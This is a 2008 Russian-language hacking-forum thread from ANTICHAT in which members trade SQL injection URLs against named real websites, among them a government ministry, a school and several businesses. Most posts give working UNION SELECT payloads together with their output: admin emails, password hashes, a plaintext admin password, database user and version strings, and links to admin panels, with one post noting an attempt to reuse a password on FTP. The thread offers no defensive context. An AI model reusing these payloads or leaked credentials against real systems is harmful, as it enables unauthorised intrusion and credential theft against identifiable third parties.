ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4361  
Старый 06.01.2008, 19:06
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Tigger,

Цитата:
http://www.bikeshop.com.ua/news.php?id=-9+union+select+1,concat_ws(0x3a3a,admin_email_addr ess,admin_password),3,4,5+from+admin/*
Цитата:
http://www.bikeshop.com.ua/admin
 
Ответить с цитированием

  #4362  
Старый 06.01.2008, 19:10
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Tigger,

Цитата:
http://www.eqvitec.com/news.php?id=2&vuosi=2002&uutinen=-24+union+select+1,2,3,4,5,6,concat(uname,0x3a,upas s),8+from+admin/*
Цитата:
http://www.eqvitec.fi/admin/
 
Ответить с цитированием

  #4363  
Старый 06.01.2008, 19:11
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

laurenceschool.com

Код HTML:
http://www.laurenceschool.com/page.php?id=-13+union+select+1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1)/*&title=Links
USER:laurenceschool@10.2.3.30
VERSION:4.1.11-Debian_4sarge7
DATABASE:laurenceschool_com_-_base

dalelane.co.uk

Microsoft Access

Ни одной стандартной таблици
Только раскрытие путей и 13 столбцов.

Код HTML:
http://dalelane.co.uk/page.php?id=918+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+msysobjects+in+'.'
 
Ответить с цитированием

  #4364  
Старый 06.01.2008, 19:55
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию

Код:
http://www.mwh.gov.bh/Tnews.php?id=11+UNION+SELECT+1,user,password,4,5,6,7+FROM+users/*
 
Ответить с цитированием

Вопрос про sql-injection.
  #4365  
Старый 06.01.2008, 20:01
LAEOT
Новичок
Регистрация: 06.01.2008
Сообщений: 15
Провел на форуме:
29345

Репутация: 35
Question Вопрос про sql-injection.

Вот недавно проверял один сайт и вроде бы нашол sql injection.

Вот 2 примера из сайта:
1. я набрал этот url :
http://www.site.com/script.php?file=2-1'

Получил ответ :

Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: Unable to access 2-1 in /home/site.com/script.php on line 3

Warning: imagecreatefromjpeg(2-1) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/site.com/script.php on line 3

Warning: imagesx(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 4

Warning: imagesy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 5

Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 23

Warning: imagedestroy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 25
-------------------- это первый пример
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?
info: што в красном цвете,это текст который я водил в url (2-1')
--------------------
Второй пример:
http://www.site.com/forum.php?id=4686&start=20'
Ответ:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site.com/forum.php on line 439
------------------
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?

Зарание спасибо за ответы!
 
Ответить с цитированием

  #4366  
Старый 06.01.2008, 20:15
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

laeot не флуди !!!
иди в другую тему !!!
 
Ответить с цитированием

  #4367  
Старый 06.01.2008, 21:00
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию

Код:
http://russian.tebyan.net/Sites/default.php?id=-5898+UNION+SELECT+1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+mysql.user/*
 
Ответить с цитированием

www.centurymedia.com
  #4368  
Старый 06.01.2008, 23:33
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию www.centurymedia.com

http://www.centurymedia.com/


http://www.centurymedia.com/us/news.php?artist_ID=-31+union+select+1,2,3,user,5,6+from+mysql.user/*

Еще есть колонка password, но там только один пароли((
 
Ответить с цитированием

www.rtg.us
  #4369  
Старый 06.01.2008, 23:58
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию www.rtg.us

http://www.rtg.us/

http://www.rtg.us/news.php?mode=detail&id=-3+union+select+1,concat(name,char(58),password),3, 4,5,6,7,8+from+admins/*

admin : puhhema

Админка: http://www.rtg.us/admin

Пароль к FTP не подходит

Через limit вытащил еще пользователей, но не проверял...
Может там и будут для FTP
 
Ответить с цитированием

  #4370  
Старый 07.01.2008, 00:00
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

forestenterprise.com

Код HTML:
http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(   )),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
USER:fealtd@localhost
VERSION:4.1.22
DATABASE:fealtd

Код HTML:
http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(user,0x3a,password),2,3,4,5,6,7,8,9,   10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user/*
Таблица - mysql.user
Поля - user,password

fealtd:674bea6212f90cad
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ